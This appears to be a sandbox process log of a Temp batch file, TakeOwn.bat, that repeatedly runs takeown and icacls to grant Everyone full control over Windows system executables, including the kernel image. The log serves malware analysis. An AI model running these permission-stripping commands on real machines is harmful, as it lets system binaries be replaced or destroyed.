C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..pickerhost.appxmain_31bf3856ad364e35_10.0.22000.282_none_08c227a0c7c9c4c1\f\ModalSharePickerHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..pickerhost.appxmain_31bf3856ad364e35_10.0.22000.282_none_08c227a0c7c9c4c1\f\ModalSharePickerHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.41_none_506d5972b4817c83\f\Magnify.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.41_none_506d5972b4817c83\f\Magnify.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.41_none_506d5972b4817c83\f\Magnify.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_a6b2722d9eed2eed\f\fixmapi.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_a6b2722d9eed2eed\f\fixmapi.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_a6b2722d9eed2eed\f\fixmapi.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mdmagent_31bf3856ad364e35_10.0.22000.469_none_403fa699a3654657\f\MDMAgent.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mdmagent_31bf3856ad364e35_10.0.22000.469_none_403fa699a3654657\f\MDMAgent.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mdmagent_31bf3856ad364e35_10.0.22000.469_none_403fa699a3654657\f\MDMAgent.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_97c4601a91ef2a4b\f\mfpmp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_97c4601a91ef2a4b\f\mfpmp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_97c4601a91ef2a4b\f\mfpmp.exe" /grant "everyone":(f)
C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpconfig.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpconfig.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpconfig.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmplayer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmplayer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmplayer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpshare.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpshare.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_069016efd47610d8\f\wmpshare.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-migrationengine_31bf3856ad364e35_10.0.22000.348_none_53ff6ed560767984\f\mighost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-migrationengine_31bf3856ad364e35_10.0.22000.348_none_53ff6ed560767984\f\mighost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-migrationengine_31bf3856ad364e35_10.0.22000.348_none_53ff6ed560767984\f\mighost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\f\msconfig.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\f\msconfig.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.22000.71_none_bcb9c63bb991a4c6\f\msconfig.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_688486d306b27285\f\msinfo32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_688486d306b27285\f\msinfo32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_688486d306b27285\f\msinfo32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_8e1bee8f157fdd6d\f\msinfo32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_8e1bee8f157fdd6d\f\msinfo32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_8e1bee8f157fdd6d\f\msinfo32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mspaint_31bf3856ad364e35_10.0.22000.41_none_705d08ab0a6355da\f\mspaint.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mspaint_31bf3856ad364e35_10.0.22000.41_none_705d08ab0a6355da\f\mspaint.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-mspaint_31bf3856ad364e35_10.0.22000.41_none_705d08ab0a6355da\f\mspaint.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.22000.120_none_8faca973dc064b74\f\NarratorQuickStart.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.22000.120_none_8faca973dc064b74\f\NarratorQuickStart.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.22000.120_none_8faca973dc064b74\f\NarratorQuickStart.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-ncsiuwpapp.appxmain_31bf3856ad364e35_10.0.22000.120_none_eb1a21d23daf2030\f\NcsiUwpApp.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-ncsiuwpapp.appxmain_31bf3856ad364e35_10.0.22000.120_none_eb1a21d23daf2030\f\NcsiUwpApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-ncsiuwpapp.appxmain_31bf3856ad364e35_10.0.22000.120_none_eb1a21d23daf2030\f\NcsiUwpApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_823a5b3dd9c522d8\f\net1.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004D8
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_823a5b3dd9c522d8\f\net1.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-net1-command-line-tool_31bf3856ad364e35_10.0.22000.434_none_823a5b3dd9c522d8\f\net1.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-nfs-clientcore_31bf3856ad364e35_10.0.22000.348_none_a83a13d7c7ca92d4\f\nfsclnt.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-nfs-clientcore_31bf3856ad364e35_10.0.22000.348_none_a83a13d7c7ca92d4\f\nfsclnt.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-nfs-clientcore_31bf3856ad364e35_10.0.22000.348_none_a83a13d7c7ca92d4\f\nfsclnt.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.22000.120_none_285ae36df9fb90ad\f\OOBENetworkConnectionFlow.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.22000.120_none_285ae36df9fb90ad\f\OOBENetworkConnectionFlow.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.22000.120_none_285ae36df9fb90ad\f\OOBENetworkConnectionFlow.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..eminputhost-process_31bf3856ad364e35_10.0.22000.120_none_842c9d9e843cf6c7\f\ISM.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..eminputhost-process_31bf3856ad364e35_10.0.22000.120_none_842c9d9e843cf6c7\f\ISM.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..eminputhost-process_31bf3856ad364e35_10.0.22000.120_none_842c9d9e843cf6c7\f\ISM.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..tiveportal.appxmain_31bf3856ad364e35_10.0.22000.120_none_3da444c93fbedacf\f\OOBENetworkCaptivePortal.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..tiveportal.appxmain_31bf3856ad364e35_10.0.22000.120_none_3da444c93fbedacf\f\OOBENetworkCaptivePortal.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-o..tiveportal.appxmain_31bf3856ad364e35_10.0.22000.120_none_3da444c93fbedacf\f\OOBENetworkCaptivePortal.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel-la57_31bf3856ad364e35_10.0.22000.493_none_47936afef938817b\f\ntkrla57.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel-la57_31bf3856ad364e35_10.0.22000.493_none_47936afef938817b\f\ntkrla57.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel-la57_31bf3856ad364e35_10.0.22000.493_none_47936afef938817b\f\ntkrla57.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.22000.493_none_674ce99b39869941\f\ntoskrnl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.22000.493_none_674ce99b39869941\f\ntoskrnl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.22000.493_none_674ce99b39869941\f\ntoskrnl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.22000.120_none_9ed34dd5b0c53507\f\WpcUapApp.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.22000.120_none_9ed34dd5b0c53507\f\WpcUapApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..alcontrols.appxmain_31bf3856ad364e35_10.0.22000.120_none_9ed34dd5b0c53507\f\WpcUapApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_d171c2327b4ef3a7\f\printui.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_d171c2327b4ef3a7\f\printui.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_10.0.22000.194_none_d171c2327b4ef3a7\f\printui.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.22000.65_none_2d03a3ca59967a09\f\WpcMon.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.22000.65_none_2d03a3ca59967a09\f\WpcMon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..ntalcontrolsmonitor_31bf3856ad364e35_10.0.22000.65_none_2d03a3ca59967a09\f\WpcMon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_eb29ce0d02c88de7\f\ntprint.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_eb29ce0d02c88de7\f\ntprint.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..randprintui-ntprint_31bf3856ad364e35_10.0.22000.282_none_eb29ce0d02c88de7\f\ntprint.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\f\PeopleExperienceHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\f\PeopleExperienceHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\f\PeopleExperienceHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..rnetprinting-client_31bf3856ad364e35_10.0.22000.282_none_85f8b97e4dbf9185\f\wpnpinst.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
